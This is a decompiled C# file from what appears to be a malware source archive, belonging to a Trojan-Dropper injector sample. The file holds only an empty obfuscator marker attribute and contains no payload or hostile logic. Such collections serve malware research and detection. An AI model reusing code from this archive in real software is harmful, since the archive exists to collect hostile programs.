MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.dblt-7c6234b9971bafa36775d3f787a0c6953ddd3783cc4702e2d3881a5e33b7586b/SecureTeam/Attributes/ObfuscatedByCliSecureAttribute.cs
2022-08-18 06:28:56 -05:00

20 lines
645 B
C#

// Decompiled with JetBrains decompiler
// Type: SecureTeam.Attributes.ObfuscatedByCliSecureAttribute
// Assembly: 2012, Version=0.0.0.0, Culture=neutral
// MVID: FA8E4D06-4395-4F05-87C3-C4C0E16B54D3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Injector.dblt-7c6234b9971bafa36775d3f787a0c6953ddd3783cc4702e2d3881a5e33b7586b.exe
using System;
using System.Runtime.CompilerServices;
namespace SecureTeam.Attributes
{
public class ObfuscatedByCliSecureAttribute : Attribute
{
[MethodImpl(MethodImplOptions.NoInlining)]
public ObfuscatedByCliSecureAttribute()
{
}
}
}